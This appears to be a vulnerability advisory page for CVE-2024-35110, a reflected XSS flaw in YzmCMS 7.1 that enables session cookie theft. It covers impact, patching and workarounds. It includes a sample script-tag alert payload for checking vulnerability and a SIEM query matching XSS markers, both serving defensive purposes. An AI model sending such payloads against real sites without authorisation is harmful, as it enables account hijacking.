Login Sign Up

CVE-2024-35110

5.5 MEDIUM
Cross-Site Scripting

📋 TL;DR

A reflected cross-site scripting (XSS) vulnerability in YzmCMS 7.1 allows attackers to steal session cookies from logged-in users. When authenticated users click malicious links containing crafted payloads, attackers can capture their authentication cookies. This affects all YzmCMS 7.1 installations with default configurations.

💻 Affected Systems

Products:
  • YzmCMS
Versions: 7.1
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Requires user authentication - only affects logged-in users who click malicious links.

📦 What is this software?

Yzmcms by Yzmcms

View all CVEs affecting Yzmcms →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers steal administrator session cookies, gain full administrative access to the CMS, and potentially compromise the entire web application and underlying server.

🟠

Likely Case

Attackers steal user session cookies to hijack accounts, perform unauthorized actions, and access sensitive user data within the CMS.

🟢

If Mitigated

With proper input validation and output encoding, the attack fails to execute JavaScript payloads, preventing cookie theft.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires social engineering to trick authenticated users into clicking malicious links.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 7.2 or later

Vendor Advisory: https://github.com/yzmcms/yzmcms/issues/68

Restart Required: No

Instructions:

1. Backup your current installation. 2. Download YzmCMS 7.2 or later from the official repository. 3. Replace the vulnerable file yzmphp/core/class/application.class.php with the patched version. 4. Verify the fix by testing with XSS payloads.

🔧 Temporary Workarounds

Input Validation Filter

all

Add server-side input validation to sanitize user input before processing.

Modify application.class.php to implement htmlspecialchars() or similar filtering on user inputs

Content Security Policy

all

Implement CSP headers to restrict script execution from untrusted sources.

Add header: Content-Security-Policy: script-src 'self'

🧯 If You Can't Patch

  • Implement web application firewall (WAF) rules to block XSS payloads in URLs
  • Educate users about phishing risks and implement session timeout policies

🔍 How to Verify

Check if Vulnerable:

Test by accessing a URL with XSS payload like: /path?param=<script>alert(1)</script> while authenticated

Check Version:

Check YzmCMS version in admin panel or read version.txt file

Verify Fix Applied:

After patching, test with same XSS payload - script should not execute and should be properly encoded in output

📡 Detection & Monitoring

Log Indicators:

  • Unusual long URLs with script tags in access logs
  • Multiple failed login attempts followed by successful login from new IP

Network Indicators:

  • HTTP requests containing <script> tags in query parameters
  • Outbound connections to suspicious domains after user visits crafted URLs

SIEM Query:

source="web_access.log" AND ("<script" OR "javascript:" OR "onerror=" OR "onload=")

📊 Metadata

CVE ID: CVE-2024-35110
CVSS v3 Score: 5.5 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L
CWE: CWE-79
Published: May 17, 2024
Last Updated: June 10, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-35110, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)